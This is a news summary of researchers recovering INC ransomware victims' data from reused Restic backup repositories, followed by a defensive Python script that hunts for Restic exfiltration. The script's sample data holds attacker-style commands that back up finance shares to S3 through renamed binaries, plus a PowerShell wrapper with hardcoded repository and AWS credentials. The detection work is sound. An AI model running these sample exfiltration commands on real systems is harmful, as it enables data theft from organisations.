An operational security failure let researchers recover encrypted data stolen by the INC ransomware gang from a dozen U.S. organizations. Cyber Centaurs' forensic analysis exposed reused Restic-based backup infrastructure that still held victim data, allowing the data to be decrypted and preserved as evidence while the team produced detection rules and coordinated with law enforcement. #RainINC #Restic
Key points
- An operational security failure let Cyber Centaurs access attacker infrastructure and recover stolen data from 12 U.S. organizations.
- Investigators found Restic artifacts, hardcoded credentials, renamed binaries, and PowerShell scripts, indicating that the gang kept long-lived backup repositories and reused them across intrusions.
- Encrypted Restic backups in attacker-controlled S3 repositories contained data exfiltrated from ransomware incidents unrelated to the one under investigation.
- Researchers decrypted and preserved victim data and coordinated with law enforcement to validate ownership and handle evidence.
- Cyber Centaurs published YARA and Sigma rules and an inventory of INC tooling to help defenders detect similar activity.
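The findings above (renamed binaries, Restic repository arguments pointing at S3, and credentials hardcoded in PowerShell scripts) suggest two hunting checks a defender can run without the gang's specific indicators. The example below is added here and is not Cyber Centaurs' published YARA or Sigma content: it flags Restic-style command lines regardless of the image name, using Restic's real `-r`/`--repo` flag, backend prefixes (`s3:`, `sftp:`, `rest:`, ...) and `RESTIC_PASSWORD`/`AWS_*` environment variables, and it scans script text for literal credential assignments. The process events, image paths, bucket names and script are constructed sample data, and the field names `image`/`cmdline` are an assumption about the telemetry source.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry). Two of the
# three Restic invocations use a renamed binary, as the investigation described.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Temp\svchost_upd.exe",
     "cmdline": r"svchost_upd.exe -r s3:s3.us-east-1.amazonaws.com/bkp-7731 backup D:\Shares\Finance --tag q3"},
    {"image": r"C:\ProgramData\tools\rc.exe",
     "cmdline": r"rc.exe -r s3:s3.amazonaws.com/store1 init --password-file C:\ProgramData\tools\p.txt"},
    {"image": r"C:\Program Files\restic\restic.exe",
     "cmdline": r"restic.exe snapshots -r sftp:backup@nas.corp.local:/repo"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\jdoe\notes.txt"},
]

# Constructed PowerShell wrapper of the kind described in the report, with
# credentials hardcoded. The AWS key is Amazon's documented example key.
SAMPLE_SCRIPT = r'''
$env:RESTIC_REPOSITORY = "s3:s3.amazonaws.com/bkp-7731"
$env:RESTIC_PASSWORD = "Winter2024!"
$env:AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
$env:AWS_SECRET_ACCESS_KEY = "examplesecret"
& "$env:TEMP\svchost_upd.exe" backup D:\Shares
'''

# Restic subcommands worth alerting on; matched as whole tokens only, so a
# path component such as D:\backup does not trigger.
RESTIC_SUBCOMMANDS = {"backup", "init", "snapshots", "restore", "forget", "prune",
                      "check", "unlock", "ls", "dump", "key", "cat", "stats", "find"}

# Repository argument with a remote backend prefix: "-r s3:..." or "--repo=sftp:...".
BACKEND_RE = re.compile(
    r"(?:^|\s)(?:-r|--repo)(?:\s+|=)(?P<repo>(?:s3|sftp|rest|b2|azure|gs|swift|rclone):\S+)",
    re.I)

# Signs that the repository password or cloud keys are supplied on the command line
# or via environment variables rather than interactively.
CRED_RE = re.compile(
    r"--password-(?:file|command)\b|\bRESTIC_PASSWORD(?:_FILE|_COMMAND)?\b"
    r"|\bAWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY)\b", re.I)

# Literal credential assignments in PowerShell ($env:X = "...") or POSIX shell (export X=...).
CRED_ASSIGN_RE = re.compile(
    r"(?:\$env:|export\s+)(RESTIC_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)"
    r"\s*=\s*[\"']?([^\"'\s]+)[\"']?", re.I)


@dataclass
class Finding:
    image: str
    repo: str
    subcommand: str
    renamed: bool          # binary name does not start with "restic"
    credential_hint: bool  # password/key material passed non-interactively


def analyze_cmdline(image: str, cmdline: str):
    """Return a Finding if the command line looks like a Restic repository operation."""
    m = BACKEND_RE.search(cmdline)
    if not m:
        return None
    subs = [t.lower() for t in cmdline.split() if t.lower() in RESTIC_SUBCOMMANDS]
    if not subs:
        return None
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return Finding(image=image, repo=m.group("repo"), subcommand=subs[0],
                   renamed=not basename.startswith("restic"),
                   credential_hint=bool(CRED_RE.search(cmdline)))


def scan_process_events(events):
    """Apply analyze_cmdline to every event and keep the hits, in input order."""
    return [f for f in (analyze_cmdline(e["image"], e["cmdline"]) for e in events) if f]


def find_hardcoded_credentials(script_text: str) -> dict:
    """Map credential variable names to the literal values assigned in a script."""
    return {name.upper(): value for name, value in CRED_ASSIGN_RE.findall(script_text)}


if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f"{f.subcommand:>9} -> {f.repo}  renamed={f.renamed} creds={f.credential_hint}  ({f.image})")
    for name, value in find_hardcoded_credentials(SAMPLE_SCRIPT).items():
        print(f"hardcoded {name} = {value!r}")
```

Matching on the repository argument rather than the image name is the point: a renamed `restic.exe` still has to be told where the repository is, and a remote backend prefix on a host that has no sanctioned Restic deployment is a strong signal. Treat the renamed-binary and credential-hint flags as severity modifiers, and tune the backend list and subcommand set to what your environment legitimately uses.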